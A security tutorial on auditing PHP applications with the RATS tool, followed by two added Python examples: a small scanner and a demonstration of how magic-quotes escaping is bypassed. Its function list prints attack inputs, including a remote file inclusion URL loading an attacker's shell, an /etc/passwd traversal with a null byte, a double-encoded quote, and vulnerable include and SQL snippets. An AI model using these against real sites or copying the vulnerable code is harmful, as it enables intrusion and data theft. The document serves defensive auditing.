Using RATS to Audit PHP Web Applications
(c) 2008 dB

RATS Home: http://www.fortifysoftware.com/security-resources/rats.jsp
HTML Version: http://rawsecurity.org/articles/RATS.html

+ Introduction

RATS, the Rough Auditing Tool for Security, is a free security auditing utility that scans C, C++, PHP, Perl, and Python source code. The tool does not find definite security bugs in the source code; it simply flags potentially dangerous function calls and gives a brief description of the problem and possible remedies. While it can find many common security-related programming errors, such as buffer overflows and race conditions, RATS is not geared toward finding many of the vulnerabilities that plague web applications. Luckily, RATS can be given a custom vulnerability database in XML format to help identify issues such as cross-site scripting, SQL injection, remote file inclusion, and command injection.

+ Basic Usage

Once you have RATS installed on your machine, simply run the following command in the top-level directory of the PHP application in question.

    rats .

A portion of the output is shown below.

    ./src/plugins/contact-form/plugin-func.php:280: High: mail
    ./src/plugins/gallery/plugin-func.php:656: High: mail
    ./src/plugins/guestbook/plugin-func.php:376: High: mail
    Arguments 1, 2, 4 and 5 of this function may be passed to an external
    program. (Usually sendmail). Under Windows, they will be passed to a
    remote email server. If these values are derived from user input, make
    sure they are properly formatted and contain no unexpected characters or
    extra data.

RATS will scan each file specified and produce a vulnerability report once it is done. As you can see from the output, RATS located three uses of the mail function in the entire application. The filenames, line numbers, and warning levels are all shown. You should then open each file and make sure that the input to the mail function isn't vulnerable to email injection.
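To make concrete what a report like the one above reflects, here is an added example, written for this article rather than taken from it or from RATS: a miniature RATS-style scanner in Python. It loads a vulnerability database in the XML layout RATS' bundled databases use (the Vulnerability, Name, Info, Severity and Description element names are assumed from those files), finds uses of the listed functions in PHP source, filters them by a warning level (1 = High only, 2 = High and Medium, 3 = everything), and renders hits in the file:line: Severity: name layout shown above. The database and the PHP file are constructed samples embedded in the script so it runs offline; the comment and string handling is a per-line simplification, not RATS' own lexer.

```python
"""Miniature RATS-style scanner (added example; not RATS' code)."""
import re
import xml.etree.ElementTree as ET

# Constructed sample database in the layout of RATS' bundled XML databases
# (element names assumed from those files; this is not the article's rats.xml).
SAMPLE_DB = """<?xml version="1.0"?>
<VulnDB lang="php">
  <Vulnerability>
    <Name>mail</Name>
    <Info>
      <Severity>High</Severity>
      <Description>Arguments may reach an external program such as sendmail; check for header injection.</Description>
    </Info>
  </Vulnerability>
  <Vulnerability>
    <Name>include</Name>
    <Info>
      <Severity>High</Severity>
      <Description>Includes and evaluates a file; unfiltered input allows local or remote file inclusion.</Description>
    </Info>
  </Vulnerability>
  <Vulnerability>
    <Name>phpinfo</Name>
    <Info>
      <Severity>Low</Severity>
      <Description>Exposes configuration details.</Description>
    </Info>
  </Vulnerability>
</VulnDB>
"""

# Constructed sample PHP source to scan.
SAMPLE_PHP = """<?php
// contact form handler (constructed example)
$page = $_GET['page'];
include "/pages/{$page}.html";   // line 4: hit
mail($to, $subject, $body);       // line 5: hit
// mail() mentioned only in this comment: must not be reported
$x = "mail(a, b)";                // string literal, not a call
phpinfo();                        // line 8: hit at warning level 3 only
"""

# Warning level each severity is shown at: -w 1 -> High, -w 2 -> High and
# Medium (the default), -w 3 -> everything.
LEVEL = {"High": 1, "Medium": 2, "Low": 3}

# Single- or double-quoted PHP string literal on one line.
STRING_RE = re.compile(r'"(?:\\.|[^"\\])*"' + r"|'(?:\\.|[^'\\])*'")


def load_db(xml_text):
    """Return {function_name: (severity, description)} from a RATS-style database."""
    db = {}
    for vuln in ET.fromstring(xml_text).iter("Vulnerability"):
        info = vuln.find("Info")
        name = vuln.findtext("Name").strip()
        severity = info.findtext("Severity").strip()
        description = " ".join(info.findtext("Description").split())
        db[name] = (severity, description)
    return db


def code_only(line):
    """Blank out string literal contents, then drop a trailing // or # comment.
    Per-line simplification: block comments spanning lines are not tracked."""
    line = STRING_RE.sub('""', line)
    return re.split(r"//|#", line, maxsplit=1)[0]


def scan(path, source, db, warning_level=2):
    """Report uses of database functions at or above warning_level.
    A use is a bare identifier (not $var, ->method, ::static or a definition),
    so both mail(...) and include "..." are matched."""
    pattern = re.compile(r"(?<![\w$>:])(" + "|".join(map(re.escape, db)) + r")\b")
    findings = []
    for lineno, raw in enumerate(source.splitlines(), start=1):
        line = code_only(raw)
        for m in pattern.finditer(line):
            if re.search(r"function\s+$", line[:m.start()]):
                continue  # defining a function of that name, not calling it
            name = m.group(1)
            severity, description = db[name]
            if LEVEL[severity] <= warning_level:
                findings.append((path, lineno, severity, name, description))
    return findings


def scan_file(path, db, warning_level=2):
    """Scan a file on disk with the same rules."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan(path, fh.read(), db, warning_level)


def report(findings):
    """Render findings in the 'file:line: Severity: name' layout RATS prints."""
    out = []
    for path, lineno, severity, name, description in findings:
        out.append(f"{path}:{lineno}: {severity}: {name}")
        out.append("  " + description)
    return "\n".join(out)


if __name__ == "__main__":
    db = load_db(SAMPLE_DB)
    print(report(scan("./vuln.php", SAMPLE_PHP, db, warning_level=3)))
```

Run as is, the script reports the include on line 4, the mail on line 5 and, because the level is 3, the phpinfo on line 8; the mail inside the comment and the one inside the string literal are skipped. Point scan_file at a real file to use it on an application.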
By default RATS will only show high and medium severity vulnerabilities. To show all possible problems, use the following command.

    rats . -w 3

+ Vulnerability Databases

RATS stores vulnerability information in XML format, which makes it easy to alter. Consider the small example below.

    <Vulnerability>
      <Name>include</Name>
      <Info>
        <Severity>High</Severity>
        <Description>
          The include() statement includes and evaluates the specified file.
          Make sure the input is properly sanitized to prevent a user from
          including a local or remote file.
        </Description>
      </Info>
    </Vulnerability>

As you might have guessed, Name is the name of the questionable method. Possible values for Severity are High, Medium, or Low, and they correspond to warning levels 1, 2, and 3 of the -w option. The Description is displayed to the user when the method is found in a source code file.

The -d command-line parameter tells RATS to use an additional vulnerability database. To suppress the default databases, use the -x option. Partial output of running

    rats . -d myVulDB.XML

is shown below.

    ./vuln.php:34: High: include
    The include() statement includes and evaluates the specified file. Make
    sure the input is properly sanitized to prevent a user from including a
    local or remote file.

At this point you may want to look into how remote file inclusion works to understand why methods such as include and require should be scrutinized.

+ Function Explanations

I've put together a vulnerability database specifically for web application audits, available at http://rawsecurity.org/articles/rats.xml. If you know of any additional PHP methods that should be identified in a security audit, don't hesitate to send me an email. A brief description of each function in the database is shown below.

base64_decode - Not dangerous by itself, but could be used to bypass magic_quotes_gpc.

bzopen - See file.

eval - Very dangerous. Evaluates a string as PHP code. Check for possible code injection.

exec - Using user input with exec is very dangerous and could lead to a command injection vulnerability.
extract - Imports variables from an array into the symbol table. Example vulnerable code:

    extract($_GET);
    require($basedir . "platform/fs.php");

Very dangerous if the array happens to be $_GET, $_POST, or $_COOKIE.

    index.php?basedir=http://path/to/attacker/shell/

file - Check for a local file inclusion vulnerability. If the allow_url_fopen configuration directive is enabled, the file method can open remote resources as well.

file_get_contents - See file.

fopen - See file.

gzopen - See file.

header - The header method could be used for an HTTP Response Splitting or XSS attack.

import_request_variables - Imports GET, POST, and/or Cookie variables into the global scope. This is like enabling register_globals for one specific form. Could lead to many different types of vulnerabilities.

include - Possible code injection if the include method takes user input that is not properly filtered. Example vulnerable code:

    include "/pages/{$_GET['page']}.html";

Depending on the environment, it might be possible to terminate the string with a null character. This allows an attacker to get rid of the file extension (html in the example).

    index.php?page=../../../../etc/passwd%00

include_once - See include.

mssql_query - Executes a query against a SQL Server database. Check how the user input is filtered for possible SQL injection. Example vulnerable code:

    $sql = "SELECT * FROM pages WHERE id = {$_POST['id']}";
    mssql_query($sql);

Not vulnerable if magic quotes is on:

    $sql = "SELECT * FROM pages WHERE id = '" . $_POST['id'] . "'";
    mssql_query($sql);

mysql_query - Executes a query against a MySQL database. See mssql_query.

odbc_exec - Executes a SQL statement using Open Database Connectivity. See mssql_query.

passthru - See exec.

pg_query - Executes a query against a PostgreSQL database. See mssql_query.

phpinfo - The phpinfo method shows configuration information about PHP. Depending on how the application is written, database access credentials may be exposed.

popen - See file.
preg_replace - Useful for making string replacements, but carries the same risk as the eval method if the 'e' modifier is used. The replacement parameter will be run as PHP code after the string replacement.

proc_open - See exec.

readfile - See file.

require - See include.

require_once - See include.

setcookie - The setcookie method could be used for an HTTP Response Splitting or XSS attack.

shell_exec - See exec.

system - See exec.

unserialize - Not dangerous by itself, but could be used to bypass magic_quotes_gpc.

urldecode - Not dangerous by itself, but could be used to bypass magic_quotes_gpc. Because the web server has already decoded the request once, %2527 reaches the script as %27, which urldecode then converts into a single quote.

+ Summary

As the name implies, RATS only provides a rough starting point for finding software vulnerabilities in applications. White box and black box testing should be used together to uncover security-related bugs.
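The three magic_quotes_gpc entries in the list above (base64_decode, unserialize, urldecode) share one mechanism: the escaping layer runs before the application decodes the value a second time, so whatever the decode produces is never escaped. The Python script below is an added example, not part of the article, that simulates that pipeline (web server decode, then magic_quotes_gpc, then the application's own decode) for the urldecode and base64_decode cases, shows at each stage whether a quote is still escaped, and then shows the remedy: a parameterized query, run against a constructed in-memory SQLite table. The addslashes port, the table and every input value are constructed for the example; unserialize is not simulated because it needs no decoder to make the point.

```python
"""Why a decode after magic_quotes_gpc defeats it (added example)."""
import base64
import re
import sqlite3
from urllib.parse import unquote


def addslashes(value):
    """Port of PHP's addslashes(), the transformation magic_quotes_gpc
    applied to every GET, POST and COOKIE value before the script ran."""
    return (value.replace("\\", "\\\\").replace("'", "\\'")
                 .replace('"', '\\"').replace("\0", "\\0"))


# Application-side decoders from the list above; each runs AFTER magic quotes.
APP_DECODERS = {
    "urldecode": unquote,
    "base64_decode": lambda v: base64.b64decode(v).decode("utf-8"),
}


def has_unescaped_quote(value):
    """True if the value holds a single quote not preceded by a backslash,
    i.e. one that would end a quoted SQL literal it is spliced into."""
    return re.search(r"(?<!\\)'", value) is not None


def trace(raw_query_value, decoder="urldecode"):
    """Follow one raw query-string value through the pipeline:
    web server decode -> magic_quotes_gpc -> application decode."""
    server_decoded = unquote(raw_query_value)          # %2527 -> %27, %27 -> '
    after_magic_quotes = addslashes(server_decoded)    # escapes only quotes present NOW
    after_app_decode = APP_DECODERS[decoder](after_magic_quotes)
    return {
        "server_decoded": server_decoded,
        "after_magic_quotes": after_magic_quotes,
        "after_app_decode": after_app_decode,
        # Splicing after_app_decode into a quoted literal is only sound if
        # every quote in it is still escaped.
        "safe_to_splice": not has_unescaped_quote(after_app_decode),
    }


def make_db():
    """Constructed in-memory table standing in for the article's pages table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (name TEXT, title TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)",
                     [("home", "Home"), ("about", "About")])
    return conn


def lookup_parameterized(conn, raw_query_value, decoder="urldecode"):
    """The remedy: decode as the application needs, then bind the value as a
    query parameter, so no escaping layer has to run at exactly the right
    moment. A quote in the value is data, never syntax."""
    value = APP_DECODERS[decoder](unquote(raw_query_value))
    return conn.execute("SELECT title FROM pages WHERE name = ?", (value,)).fetchall()


if __name__ == "__main__":
    for raw, dec in [("%27", "urldecode"), ("%2527", "urldecode"),
                     ("Jw%3D%3D", "base64_decode")]:   # Jw== is base64 for '
        print(raw, dec, trace(raw, dec))
    conn = make_db()
    print(lookup_parameterized(conn, "home"), lookup_parameterized(conn, "%2527"))
```

For %27 the trace shows the quote escaped by magic quotes and still escaped after urldecode; for %2527 and for the base64 form the value contains no quote when magic quotes runs, so the quote that appears after the application's decode is bare. The parameterized lookup returns the Home row for the name home and no rows for the decoded quote, without any error.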